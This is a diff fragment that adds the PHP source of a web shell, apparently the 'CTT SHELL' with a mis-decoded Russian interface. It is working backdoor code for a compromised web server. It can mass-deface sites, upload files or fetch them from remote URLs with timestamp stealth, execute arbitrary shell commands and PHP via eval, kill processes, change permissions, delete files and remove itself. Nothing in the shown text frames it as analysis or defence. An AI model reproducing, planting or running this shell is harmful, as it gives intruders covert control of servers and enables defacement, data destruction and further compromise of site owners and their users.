+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$sul."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$sul."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>Ñàìîóäàëèòü: ".__FILE__." <br>Âû óâåğåííû?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+"name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+"text"=>$text, "text_regexp"=>$text_regxp,
+"text_wwo"=>$deface_text_wwo,
+"text_cs"=>$deface_text_cs,
+"text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {ctfsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+"name"=>$search_name, "name_regexp"=>$search_name_regexp,
+"text"=>$search_text, "text_regexp"=>$search_text_regxp,
+"text_wwo"=>$search_text_wwo,
+"text_cs"=>$search_text_cs,
+"text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+ctfsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $perms = fileperms($d.$f);
+ if (!$perms) {echo "Can't get current mode.";}
+ elseif ($submit)
+ {
+  if (!isset($owner[0])) {$owner[0] = 0;}
+  if (!isset($owner[1])) {$owner[1] = 0; }
+  if (!isset($owner[2])) {$owner[2] = 0;}
+  if (!isset($group[0])) {$group[0] = 0;}
+  if (!isset($group[1])) {$group[1] = 0;}
+  if (!isset($group[2])) {$group[2] = 0;}
+  if (!isset($world[0])) {$world[0] = 0;}
+  if (!isset($world[1])) {$world[1] = 0;}
+  if (!isset($world[2])) {$world[2] = 0;}
+  $sum_owner = $owner[0] + $owner[1] + $owner[2];
+  $sum_group = $group[0] + $group[1] + $group[2];
+  $sum_world = $world[0] + $world[1] + $world[2];
+  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
+  $ret = @chmod($d.$f, $sum_chmod);
+  if ($ret) {$act = "ls";}
+  else {echo "<b>Èçìåíåíèå Àòğèáóò Ôàéëà (".$d.$f.")</b>: Îøèáêà<br>";}
+ }
+ else
+ {
+  echo "<center><b>Èçìåíåíèå Àòğèáóò Ôàéëà</b><br>";
+  $perms = view_perms(fileperms($d.$f));
+  $length = strlen($perms);
+  $owner_r = $owner_w = $owner_x =
+  $group_r = $group_w = $group_x = 
+  $world_r = $world_w = $group_x = "";
+
+  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
+  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
+  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
+  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
+ if ($perms[9] == "x") {$world_x = " checked";}
+  echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
+<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
+<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
+<table class=table1><tr><td class=td2><table class=table1 align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td class=td2><b>Owner</b><br><br>
+<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
+<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td class=td2><b>Group</b><br><br>
+<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
+<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
+<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
+<td class=td2><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
+<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
+<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
+</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Ñîõğàíèòü\"></td></tr></table></FORM></center>";
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+else {$destin = $userfilename;}
+if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Îøèáêà, çàãğóæàşùàÿ ôàéë ".$uploadfile[name]." (íå ìîæåò ñêîïèğîâàòü \"".$uploadfile[tmp_name]."\" íà \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+else
+{
+ $destin = explode("/",$destin);
+ $destin = $destin[count($destin)-1];
+ if (empty($destin))
+ {
+  $i = 0;
+  $b = "";
+  while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+}
+if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+else
+{
+ $st = getmicrotime();
+ $content = @file_get_contents($uploadurl);
+ $dt = round(getmicrotime()-$st,4);
+ if (!$content) {$uploadmess .=  "Íå ìîæåò çàãğóçèòü ôàéë!<br>";}
+ else
+ {
+  if ($filestealth) {$stat = stat($uploadpath.$destin);}
+  $fp = fopen($uploadpath.$destin,"w");
+  if (!$fp) {$uploadmess .= "Îøèáêà, ïèøóùàÿ ôàéëó ".htmlspecialchars($destin)."!<br>";}
+  else
+  {
+fwrite($fp,$content,strlen($content));
+fclose($fp);
+if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+  }
+ }
+}
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>Çàãğóçêà Ôàéëà:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$sul."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Ëîêàëüíûé ôàéë: <br><input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;èëè<br>
+Çàãğóçèòü èç URL: <br><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Ñîõğàíèòü ıòîò ôàéëü â ïàïêó: <br><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+Èìÿ Ôàéëà: <br><input name=uploadfilename size=25>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;Êîíâåğòèğîâàòü èìÿ ôàéëà<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Çàãğóçèòü\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ }
+ $act = "ls";
+}
+if ($act == "onedelete")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "onedeleted")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($d+'/'+$f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $data = $deface_html;
+  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
+  $data = str_replace("%%%filename%%%",basename($v),$data);
+  $data = str_replace("%%%filepath%%%",$v,$data);
+  $fp = @fopen($v,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèğîâàòü ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåğåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Ïğèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+$cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+$v = str_replace("\\","/",$v);
+if (is_dir($v))
+{
+ if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+ $v .= "*";
+}
+$cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Íå ìîæåò íàçâàòü archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+if (in_array($v,$ret)) {fs_rmobj($v);}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèğîâàòü ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåğåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Ïğèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+while ($o = readdir($h)) {$list[] = $d.$o;}
+closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Íå ìîæåò îòêğûòü ñïğàâî÷íèê (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; 
+  if ($vd == "f")
+  {
+$row = array();
+$row[] = "<b><center>Èìÿ</b>";
+$row[] = "<b><center>Ğàçìåğ</center></b>";
+$row[] = "<b><center>Èçìåíåí</center></b>";
+if (!$win)
+  {$row[] = "<b><center>Âëàäåëåö/Ãğóïïà</center></b>";}
+$row[] = "<b><center>Ïğàâà</center></b>";
+$row[] = "<b><center>Ôóíêöèè</center></b>";
+
+$k = $sort[0];
+if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+if (empty($sort[1])) {$sort[1] = "d";}
+if ($sort[1] != "a")
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$sul."act=img&img=sort_desc\" border=\"0\"></a></center>";
+}
+else
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$sul."act=img&img=sort_asc\" border=\"0\"></a></center>";
+}
+
+$row[$k] .= $y;
+for($i=0;$i<count($row)-1;$i++)
+{
+ if ($i != $k) {$row[$i] = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
+}
+
+$tab = array();
+$tab[cols] = array($row);
+$tab[head] = array();
+$tab[dirs] = array();
+$tab[links] = array();
+$tab[files] = array();
+
+foreach ($list as $v)
+{
+ $o = basename($v);
+ $dir = dirname($v);
+  
+ if ($disp_fullpath) {$disppath = $v;}
+ else {$disppath = $o;}
+ $disppath = str2mini($disppath,60);
+  
+ if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+ elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+ $uo = urlencode($o);
+ $ud = urlencode($dir);
+ $uv = urlencode($v);
+
+ $row = array();
+
+if (is_dir($v))
+ {
+  if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+  else {$type = "DIR";}
+  $row[] =  "<a href=\"".$sul."act=ls&d=".$uv."&sort=".$sort."\"> <img src=\"".$sul."act=img&img=small_dir\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = $type;
+ }
+ elseif(is_file($v))
+ {
+  $ext = explode(".",$o);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $row[] =  "<a href=\"".$sul."act=f&f=".$uo."&d=".$ud."&\"><img src=\"".$sul."act=img&img=ext_".$ext."\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = view_size(filesize($v));
+ }
+ $row[] = "<center>".date("d.m.Y H:i:s",filemtime($v))."</center>";
+  
+ if (!$win)
+ {
+  $ow = @posix_getpwuid(fileowner($v));
+  $gr = @posix_getgrgid(filegroup($v));
+  $row[] = "<center>".$ow["name"]."/".$gr["name"]."</center>";
+ }
+
+ if (is_writable($v)) {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\">".view_perms(fileperms($v))."</a>";}
+ else {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
+
+ if (is_dir($v)) {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=onedeleted&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+ else {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$sul."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$sul."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=onedelete&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+
+ if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+ elseif (is_link($v)) {$tab[links][] = $row;}
+ elseif (is_dir($v)) {$tab[dirs][] = $row;}
+ elseif (is_file($v)) {$tab[files][] = $row;}
+}
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+global $v;
+return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+$tab[dirs] = array_reverse($tab[dirs]);
+$tab[files] = array_reverse($tab[files]);
+  }
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<TABLE class=table1  cellSpacing=0 cellPadding=0 width=100% border=0>
+<form method=\"POST\">";
+$smsn=0;
+  foreach($table as $row)
+  {
+$smsn++;
+ if ($smsn!=2 && $smsn!=3) { 
+echo "<tr>\r\n";
+foreach($row as $v) {echo "<td class=tds1 bgcolor=#242424>".$v."</td>\r\n";}
+echo "</tr>\r\n";
+}
+
+  }
+  echo "</table><TABLE height=1% class=table2 cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0>
+<tr class=tr2>
+<td width=8% height=1%><font size=2 color=#000000>
+Ïàïêè: ".(count($tab[dirs])+count($tab[links]))."</font></td>
+<td width=8% height=1%><font size=2 color=#000000> Ôàéëû: ".count($tab[files])."</font></td><td height=1% vAlign=top align=right>";
+if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Âñòàâèòü\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Ïóñòîé áóôåğ\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">Ñ îòîáğàííûì:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Óäàëèòü</option>";
+  if ($usefsbuff)
+  {
+echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Âûğàçàòü</option>";
+echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Êîïèğîâàòü</option>";
+echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Íåâûáğàòü</option>";
+  }
+  if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Íåâûáğàòü</option>";}
+  echo "</select>&nbsp;<input type=\"submit\" value=\"Ïîäòâåğäèòü\">";
+  echo "</form>";
+
+echo "</td></tr></table>";
+echo "</td></tr></table><br><center><font size=2 color=#aaaaaa>[<a href=http://ctt.void.ru>CTT</a>] SHELL ver ".$shver."</font></center>";
+ }
+
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>Ğåçóëüòàò âûïîëíåíèÿ ıòà êîìàíäà</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+myshellexec($cmd);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($cmd_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($cmd_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ myshellexec($cmd);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Êîìàíäà âûïîëíåíèÿ:</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Âûïîëíèòü\"><input type=\"hidden\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Ïğîöåññû:</b><br>";
+ if ($win) {
+echo "<pre>";
+system('tasklist');
+echo "</pre>";
+}
+ else
+ {
+  if ($pid)
+  {
+if (!$sig) {$sig = 9;}
+echo "Sending signal ".$sig." to #".$pid."... ";
+$ret = posix_kill($pid,$sig);
+if ($ret) {echo "ok. he is dead, amen.";}
+else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+$ret = htmlspecialchars($ret);
+$ret = str_replace(""," ",$ret);
+while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+$prcs = explode("\n",$ret);
+$head = explode(" ",$prcs[0]);
+$head[] = "ACTION";
+unset($prcs[0]);
+echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+echo "<tr border=\"1\">";
+foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+echo "</tr>";
+foreach ($prcs as $line)
+{
+ if (!empty($line))
+ {
+  echo "<tr>";
+  $line = explode(" ",$line);
+  $line[10] = join(" ",array_slice($line,10,count($line)));
+  $line = array_slice($line,0,11);
+  $line[] = "<a href=\"".$sul."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+  foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+  echo "</tr>";
+ }
+}
+echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Ğåçóëüòàò âûïîëíåíèÿ ıòîò PHP-êîä</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+eval($eval);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($eval_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($eval_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ eval($eval);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>PHP-êîä âûïîëíåíèÿ</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
